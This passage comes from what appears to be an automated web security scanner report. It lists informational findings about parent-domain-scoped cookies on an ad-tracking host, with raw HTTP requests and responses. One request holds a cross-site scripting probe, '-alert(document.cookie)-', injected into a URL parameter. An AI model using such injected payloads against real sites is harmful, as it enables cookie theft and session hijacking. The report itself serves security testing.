Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rtc_Ilq4=MLsv8VUusQ9nplAbh+n6LFsXooeD0nh55ayhItw9Rx7JWLQrtG7pfYySB2GA3Nkt/3vE4EHvXHSrcNbcIO4b8B1jIlcCH5IHgInSD6DlrtrNRklXWU9LpinwxzgwQP187xxpkNoVxqc5g0Ksi0fqu3Z4OZ9TCWukp+fzOTqRG+FbCpZ1lNWeSoRp4pvl4W6xqmQFwWU4O5lq/w84KnkvAlUkVNwOL7pOF2KVroDjGpx3LQL4w25Sc5a38gWgeVY5oBcsSi4lWRF8zflEvKnkkcWc7L2wiv9axAbc68YjzxC5/fI6qGaK7mrUiBp+5iAS38/Ln32j+SV/ehLBUSTYc5NoQpVx9D9jia6uekGvE+AnaQEGnf1161LH/ZBBrd1FkNrqH87szYKBCWcJz1+P0q9PArWGYEMwtIYB5HVWRY34FsNH9AzwMFIeiW+ySqObcbfFPPZWpQi/Pk976Tx24gqtUfcN9vTjpF5mgS/YLbhW; rsi_segs_1000000=pUPFJ0OBb3IQV+XT5RxDK8mbN4dFek0UYHSBgXF1Q2jCL28cRLpw5nFpJLVQX7M6YvuDaPfQA0vCQw39GEcK40FJyvVXvFWOSkvA0VXok/sQMTNpRvi17bSmHua6WA9WZtqLPeFQc5p0QdCc3zuzABcFd6GAYPZ2ezi0szXNt2XGo/EI7zC1W/BVj13fYEHJ0qyIVY2rt0ZGH53OVeXucoR3j/OWz+KNVMeaRwjT0JUszzBtk0k2KSMtfQhkWKQf0f+e0goETYaw3hb2jqlYmCWhoKeInqG7n7nv+o5UIEVcW15FHRXvzD5LEDdm9i4=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_Ilq4=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV594t637EICbRNpWU3hmUA+HR+nmR+zdL28cRLrw7OdqtvRQX7M6YvuD6G01f/A+phz9GIcLk0FNznVXs1FOCnfg0VUZcvsQPTvmT/tqUJ5VUxzqzSb3Ao/eR1mU8vfKIj/pHS427/AX6L0pgSX6cn8xycS8eR2CQRzAVoqeD/WDRpLbKCu7CG4DBFboRtypKBI0YmtgiHu4NjZxzHRZeswDWX0PVIxLei629SeRH/9uav4xm3Icck+mB/fhC98ZQdHHNq4P9MrSX5FDdXo/2FXV/MKbYHe9gQfofsCSH7FQ796N8nPo; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:39:54 GMT; Path=/
Set-Cookie: rtc_Mkjf=MLsv7iUucA5nprADoxMUZ9S30MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZHeotOXo28EHvDL1pbOBARLmM/MYd6RgTq9u+iM7/hQBOpPrdSk21eU9Lpyn2txgsRP0c/xxljHTX7BOLqY4BgQCs3lhGEmvvtSk5ED4MMDjv8yVDLYK7pDAruXeuMbqWcYC2y8NbEmpQplW1r3QCDBMDKlKs8h8jhookQYAMg5VB8aLCKuUNV2xyc1W3wSgWiH53GskBj+0uPvbr8fL/03M+lmnwVEf4DsM5sw+zuqC6OKjBGhCiv0nZQy4ZVVoDwYqo6mnNRAo7OEEkJiv+bHNiyxW/clLxVJZkkeyyUV8ztAVi+A9zG0+EPcegfMGdz9/Dr32PiBkC/DCFzbz6JSYOyqhoYdpYn7eMNpSOdKL11qZrM6hDRzvlbWawXokjviVqpJEJmq4AbNHzRSYEvAqk8V1vS7MIKaCr4liagD/po7gg; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:39:54 GMT; Path=/
X-Proc-ms: 25
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:39:53 GMT
Content-Length: 623

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10034','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424'
...[SNIP]...
5.118. http://pix04.revsci.net/E05511/b3/0/3/0902121/806386945.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/806386945.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/806386945.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%2526affname%253DWCAX%2526adtag%253DCommunity%2526conttype%253DC%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Flink.asp%253FL%253D408799%25261ae67'-alert(document.cookie)-'3ecbfdbef18%253D1%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rtc_YFqO=MLsv8SMucD5nprADC+dAdB3TWgyy2mghBM3EFhQOAZ/gWNQv0Gro+BWjQ4EZLeo310XdXThxtQ6zdDA6J56uUqSv9qW8WduZgAsZhQNOpEq375QA5H5xY8WwU0LKdLuKEDsyFgLs2QD8nLdDzO0REKiqyMaZNMAKnMOnxXWEt8BjuZwKECyW0ZU/wYMuLfzoH/xvc6ywJ1W113TC0bnUQuUBso9vh5RFanDIGZ2QiD0apxJXYQJ3YRuQwyAQiH53Gnljo3T2HFXnMDtm7poq+UoB4RO6FWYEuNgDNyjEaq/g47KKpWhKrWKg6d7RzIqaR34ol/UyR6hDqg+9O85GQG43imOZzWup0YgPP+srSHoErx8roGJPP1d+O+kR6HEaauAX4x6nTM+FXHdYj4fjovLuNWTZDP2DZbds4wvJmpLIJZNXcbptyl9/9gulineUIz0/ATSO02q23EcUpGL65sV23BazOIoRQl98h+CXWg/apXs=; rsi_segs_1000000=pUPFJ0OBbwIMV594t637UACbRK61AlFcyDKEJCWvRS7OL2+ds3bE53FpJPW5vrupC8lCswLISBauEYbyX/hCfTUqw71LtFHOSmtg+BAo6syAKjj1Q+3MwQdGXuQjAQurVLzt4AcKK77SO1/JLy4y7xbpvqTI1+mkR40BDnTL/sDBtzWuC+DBP+6C/fB+9lvq/OiNwTC19M87f7Cvk2pPGcvev/mSAnGtT5OeJXXXkkzzpnWPDIH3iQCjcFfTnm3fqwQsqOUG6cJgaaZBH4Mwxdw3cgqajRXyq4WyJPVtmzyuXN0wYbWK8AWwK9WXjw==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_YFqO=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBLwIMVp94t6n7EICbRMHW82ldyDKEJCWvRcZbnjU8Au83YF/oiTU39v0EpRxSSEboOTyEIwX9GIcLk0FNfgXkx4D/v6War7+H+r9IY3rvMelQolIvMHaMq7diCRdHMsDM/6p5OOiwoKfjwb0+ILnBkSb48lxz2dmgeOmDeIIlf6TBsnqPCZTaXxt0nVI1j2EjFcTvlEh62I4RzXyz4HxSWyeqhp3GwTf3gD1X1cKcfw9Vkted3m9SBzb1KAzZDhf6xHRb0hLVGpypLCTtoHmLn6hjbaaWLcDPH8Cf6vjTqo9GGQZ2AMBj9io=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:39:48 GMT; Path=/
Set-Cookie: rtc_gPmG=MLsv7iUucA5nphC0/O7vtsjGNyz6AmULA1P4XndTcpIZ23d9qktkSoTcKGKIRpg710XdXThxtQ6zdFY6J95tmRiMY4yJ+sMdgAuenaLFrtrdRk1XWU9LpyjwtxgsQP0c7xxljHTX7BOLqY4xgQCs3lhGEqvHai05ED4MMDju8yVD7ZZtiMBMCGycqLqWcYC2y8NbVOx8Y1eQZ3yd0bUUw+UBsL8TnR7gPwiq0hl4MvT2YUt6oujwzI7qERgLlBVVr1Ckd5Szw9oGgYCZ3DWnFjsmwgyfZdo6malf61CzbVPZNP15BmGAfLkBkmJdnLDpC2OaS6bXfWondtA/5nZitsDt9iOXeX3L70GPHrFexa6SZ/0SCkkewx/BSDc2GjZn8H9slov9a6d6zjKI3U9d8/YecvDA6McTYIpxuqIYyG+L+BSmfQJVRVXrhI3ic9YEBCUo/esYIrRRnmxZiwg9IE39UhB58WPk2TkadyOOYhgupW0=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:39:48 GMT; Path=/
X-Proc-ms: 32
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:39:48 GMT
Content-Length: 623

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10034','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424'
...[SNIP]...
5.119. http://pix04.revsci.net/E05511/b3/0/3/0902121/871550918.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/871550918.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/871550918.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D503137%2526affname%253DWCAX%2526adtag%253DPolitical%2526conttype%253DS%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D503137%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rtc_ZS_a=MLsv7iUucA5nphC0fK8UWVoPI7fHKbGZaCQWuLR8p51z2DQ30G6uId0c9nDR2NMmzuXDJn0g0ESydFY6J95tmRiMY4yJ+sPdsYG8naLdrtr9SkW1eU9LpSjwtwgkQP0c7xx5jIRX7BMLqY4BgQCi3lhOAqvHai05Eb4PMDzu8yVD7ZZtiMBMCGycqLqWQYCGq6/md6/qYfaCA/ASs+y+9h5Xku/5nx7gfwirUhl4NHT2YUt+eLF1KH0Dtob5tEs06Q4obofo5w6/Tq+72ff/TaSCEZMZN8I5s1OOFuAASezBAhhSmCgFlyoZVVoDwXYDXkzHvff3+yl07BzRzA1eRi19Z+xwYoBSMP57irOrEQXluDeg+WH4CuHVXdpJP4HgrkGvCJrCPigIHu5GI7hwiNibi41/41/tnH36B3S/V+jJFysVDPJjnlu9tMtcj3eUM1FGM6b+OUkIZ7c78jeLogk07LTWGnScH2nMsO4=; rsi_segs_1000000=pUPFJ0OBbwIMV58ceRtDK8mbNy+QEHgUYHSBgXF1Q2gqkracs3b0+sttkvcnG4FQF1YFME4zlfRD4DXpoJTg2w/OOAXJfulf50F2dnbJ6c24OjD7TvtquFKgBZCKKyjppRZHFHcbfosrS35Xr6UaqRDJHhec0uOoN4qBjvRD7oDG89WuT/jDSRmfUKDalir3lvwuSM3Eno9UyMRLjDMJdTTZdVXvE46xEeKd+xqoVz43eYieFLzO9ksyAFN1KP1MAdnb7OHyEWmDqqeyD4JJFuhF+d/W6NEf/eIy/pVBeJG48foazTEPvZmv6aaIVHPs

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_ZS_a=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV594t637UACbRNpW80lkUA+HR+nmRzzOL28cRLrw7OdqtvRQX7M6YvuD6G01f/A+phz9GIcLk0FNfgXkx4D8v6War7+H+n9IY3rvMelQqlIvMHasq7diCRdHMsDP/apIhcFBpMun4I8++b0pgSX68nwxclAHeOABjla6/AOc2BQgDFU6b9vZkaJ68Hzv2LCrFVwbqW955VGiQa9ZwRJRQW1c/gp2cK7vRFdAePNMLM3+P6V3gVrJMrxfC4CtNT6GPmD4jam0mCUtb2pjN1+jC+69ca7GvnJmqOWlv0ccmvPKnMeXng==; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:36:09 GMT; Path=/
Set-Cookie: rtc_WzYR=MLsv8SUucA5nprAD264UWVoPI7fHKbGZaCQWuLR8p51z2DQ30G6uId0c9nDR2NMmzuXDJn0g0OQE4KL99Qp8zilVvFLegxD/FKzZzKAFPPXNSkm1eU9Lpin0xxgsRv18t9kElLVE051AluTuDnRDieHkOf9TCWukp+fyOVqRG+FbypZ1lOmeCoTp4pvl4W2xqmQFAWY4P5lr/3fAt0as+z/3c58a0YrmF2CFroRB+arCLp2/A/hlSL3YhoR/5MNsKutYjoQwhJscXN5vRZ/qEN/s+mTleYT1e0XRQJw7SG6Pb2foVCrRD5zlxI6M9xB55wUh10H6ft0R/IG6wmIogiyFxbz9L/rVYw1C4gDlVZ0sYCbRWJ8laUnjTGKqfAWyeIdxhd2ou3ym15NGUzxTHSbE3gGfUiwP1c7Rn8JWxY041sNP9IpNYh6qgR92imO/5zl3mFWhFNjp7cfhWA2MYorGw1uHV11zKR6Oij8mYbuD; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:36:09 GMT; Path=/
X-Proc-ms: 22
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:36:09 GMT
Content-Length: 593

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424','D08734_72076'
...[SNIP]...
5.120. http://pix04.revsci.net/E05511/b3/0/3/0902121/914837697.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/914837697.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/914837697.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252F%253Faffname%253DWCAX%2526adtag%253DHomepage%2526conttype%253DC%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18196%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
